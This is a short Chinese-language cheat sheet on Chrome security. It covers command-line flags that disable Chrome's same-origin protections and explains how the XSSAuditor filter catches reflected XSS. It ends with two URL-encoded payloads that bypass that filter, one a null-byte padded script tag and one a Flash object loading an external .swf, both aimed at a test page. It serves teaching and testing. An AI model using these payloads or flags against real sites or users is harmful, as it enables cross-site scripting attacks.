应用安全-浏览器安全-攻防

应用安全-浏览器安全-Chrome浏览器

关闭安全模式
暂时关闭
Linux: google-chrome --disable-web-security
Mac: open -a Google\ Chrome --args --disable-web-security
windows: 进入到chrome安装目录, chrome.exe --disable-web-security

xssAuditor

过滤器可以在脚本执行之前就可以拦截，而且任何使用webkit都可以使用这些规则
当加载网页时，xssAuditor会在渲染的之前评估用户的输入数据：
1.检查用户输入是否包含恶意内容，如果存在进行拦截
2.xssAuditor检测用户是否会反射到渲染的页面中(html实体/html熟悉/javascript/css/url)
3.评估输入上下文是否合法，非法进行过滤

chrome是在此法解析阶段进行的，xssAuditor会逐一扫描检测token，
如果token中发现危险的属性和URL进行比较，如果URL中也存在同样的数据，xssAuditor则会认为这是一个反射XSS。
demo:
解析器解析
1.依次检查标签iframe是否包含恶意属性，src/onerror
2.如果src不是以javascript:开头，则安全，放行
3.onerror中含有脚本，检查URL是否包含
4.如果出现在URL中，认为存在安全问题，将过滤
5.中止iframe标签检查

 

xssAuditor绕过

http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e Bypass Chrome 60及之前版本
http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E "只要支持flash的chrome版本（到Chrome 56），均可使用。
context == support flash